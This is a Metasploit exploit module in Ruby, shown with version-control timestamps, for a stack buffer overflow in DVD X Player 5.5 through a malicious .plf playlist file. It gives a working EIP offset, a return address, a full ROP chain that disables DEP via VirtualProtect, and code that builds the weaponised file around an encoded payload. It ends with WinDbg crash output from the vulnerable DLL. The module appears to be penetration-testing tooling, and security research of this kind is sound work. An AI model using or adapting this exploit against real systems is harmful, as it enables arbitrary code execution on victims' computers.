2011-09-01 05:14:21 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-09-01 05:14:21 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2011-09-01 05:20:47 +00:00
|
|
|
Rank = NormalRanking
|
2011-09-01 05:14:21 +00:00
|
|
|
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "DVD X Player 5.5 .plf PlayList Buffer Overflow",
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
|
|
|
|
Standard. By supplying a long string of data in a plf file (playlist), the
|
|
|
|
MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
|
|
|
|
and then copy it on the stack without any proper bounds checking, which casues a
|
|
|
|
buffer overflow, and results arbitrary code execution under the context of the user.
|
|
|
|
|
|
|
|
This module has been designed to target common Windows systems such as:
|
|
|
|
Windows XP SP2/SP3, Windows Vista, and Windows 7.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
2011-09-01 05:20:47 +00:00
|
|
|
'n00b', #Initial discovery, poc for 4.1
|
|
|
|
'D3r K0n!G', #Proof-of-concept for 5.5
|
2011-09-01 05:14:21 +00:00
|
|
|
'sickness', #ROP
|
|
|
|
'sinn3r', #Metasploit
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
2011-09-01 05:20:47 +00:00
|
|
|
[ 'CVE', '2007-3068' ],
|
|
|
|
[ 'OSVDB', '36956' ],
|
|
|
|
[ 'BID', '24278' ],
|
2012-10-23 19:02:09 +00:00
|
|
|
[ 'EDB', '17745' ],
|
2011-09-01 05:14:21 +00:00
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 1000,
|
|
|
|
'BadChars' => "\x00\x0a\x0d\x1a",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
2012-05-07 07:41:02 +00:00
|
|
|
'EXITFUNC' => "seh", #none/process/seh
|
2011-09-01 05:14:21 +00:00
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[
|
|
|
|
'DVD X Player 5.5 Standard / Pro',
|
|
|
|
{
|
|
|
|
'Offset' => 260, #To EIP
|
|
|
|
'Ret' => 0x61626702, #POP EAX; RET [EPG.dll]
|
|
|
|
'Max' => 2000, #Max buffer size
|
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
2011-09-01 05:20:47 +00:00
|
|
|
'DisclosureDate' => "Jun 02 2007",
|
2011-09-01 05:14:21 +00:00
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('FILENAME', [false, 'The file name', 'msf.plf'])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
rop = [
|
|
|
|
0x10011108, #VirtualProtect IAT [SkinScrollBar.dll]
|
|
|
|
0x616306ed, #MOV EAX, DWORD PTR DS:[EAX]; RET [EPG.dll]
|
|
|
|
0x616385d8, #XCHG EAX,ESI; RETN 0 [EPG.dll]
|
|
|
|
0x6162d202, #POP EBP; RET [EPG.dll]
|
|
|
|
0x6160cac8, #PUSH ESP [EGP.dll]
|
|
|
|
0x61626702, #POP EAX; RET [EGP.dll]
|
|
|
|
0xfffffaff, #Value to negate, will become 0x00000501
|
|
|
|
0x61627d9c, #NEG EAX; RET [epg.dll]
|
|
|
|
0x61640124, #XCHG EAX,EBX; RET [EPG.dll]
|
|
|
|
0x61626702, #POP EAX; RET [EPG.dll]
|
|
|
|
0xffffffc0, #Value to negate, will become 0x00000040
|
|
|
|
0x61627d9c, #NEG EAX; RET [EPG.dll]
|
|
|
|
0x61608ba2, #XCHG EAX,EDX; RET [EPG.dll]
|
|
|
|
0x6160b804, #POP ECX; RET [EPG.dll]
|
|
|
|
0x6164b001, #Writable location [EPG.dll]
|
|
|
|
0x6162e587, #POP EDI; RET [EPG.dll]
|
|
|
|
0x6163081d, #ROP NOP [EPG.dll]
|
|
|
|
0x61626702, #POP EAX; RET [EPG.dll]
|
|
|
|
0x90909090,
|
|
|
|
0x61620831, #PUSHAD; RET [EPG.dll]
|
|
|
|
].pack('V*')
|
|
|
|
|
|
|
|
buf = ''
|
|
|
|
buf << rand_text_alpha(target['Offset'])
|
|
|
|
buf << [target.ret].pack('V')
|
|
|
|
buf << rand_text_alpha(16)
|
|
|
|
buf << rop
|
|
|
|
buf << make_nops(15)
|
|
|
|
buf << payload.encoded
|
|
|
|
buf << rand_text_alpha(target['Max']-buf.length)
|
|
|
|
|
|
|
|
print_status("Creating #{datastore['FILENAME']}...")
|
|
|
|
file_create(buf)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
=begin
|
|
|
|
6400cd42 ffd3 call ebx {SHLWAPI!PathFindFileNameA (77f6c19c)}
|
|
|
|
0:000> p
|
|
|
|
eax=0406a15c ebx=77f6c19c ecx=00001300 edx=040600d0 esi=00000001 edi=6405362c
|
|
|
|
eip=6400cd44 esp=0012f488 ebp=00eafce0 iopl=0 nv up ei pl zr na pe nc
|
|
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
|
|
|
|
MediaPlayerCtrl+0xcd44:
|
|
|
|
6400cd44 8b8dec000000 mov ecx,dword ptr <Unloaded_ionInfo.dll>+0xeb (000000ec)[ebp] ss:0023:00eafdcc=040600d0
|
|
|
|
0:000> dd eax
|
|
|
|
0406a15c 41414141 41414141 41414141 41414141
|
|
|
|
0406a16c 41414141 41414141 41414141 41414141
|
|
|
|
0406a17c 41414141 41414141 41414141 41414141
|
|
|
|
0406a18c 41414141 41414141 41414141 41414141
|
|
|
|
0406a19c 41414141 41414141 41414141 41414141
|
|
|
|
0406a1ac 41414141 41414141 41414141 41414141
|
|
|
|
0406a1bc 41414141 41414141 41414141 41414141
|
|
|
|
0406a1cc 41414141 41414141 41414141 41414141
|
|
|
|
0:000> g
|
|
|
|
Breakpoint 2 hit
|
|
|
|
eax=0406a15c ebx=77f6c19c ecx=040600d0 edx=040600d0 esi=00000001 edi=6405362c
|
|
|
|
eip=6400cd4e esp=0012f47c ebp=00eafce0 iopl=0 nv up ei pl zr na pe nc
|
|
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
|
|
|
|
MediaPlayerCtrl+0xcd4e:
|
|
|
|
6400cd4e ff17 call dword ptr [edi] ds:0023:6405362c=6400d890
|
|
|
|
0:000> g
|
|
|
|
(464.c0c): Access violation - code c0000005 (first chance)
|
|
|
|
First chance exceptions are reported before any exception handling.
|
|
|
|
This exception may be expected and handled.
|
|
|
|
eax=00001389 ebx=040600d0 ecx=00000177 edx=0406a15c esi=0406af08 edi=00130000
|
|
|
|
eip=6400dd50 esp=0012f234 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
|
|
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
|
|
|
|
MediaPlayerCtrl!DllCreateObject+0x220:
|
|
|
|
6400dd50 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
|
|
|
|
0:000> !address 6400dd50
|
|
|
|
64000000 : 64001000 - 0004e000
|
|
|
|
Type 01000000 MEM_IMAGE
|
|
|
|
Protect 00000020 PAGE_EXECUTE_READ
|
|
|
|
State 00001000 MEM_COMMIT
|
|
|
|
Usage RegionUsageImage
|
|
|
|
FullPath C:\Program Files\Aviosoft\DVD X Player 5.5 Standard\MediaPlayerCtrl.dll
|
|
|
|
=end
|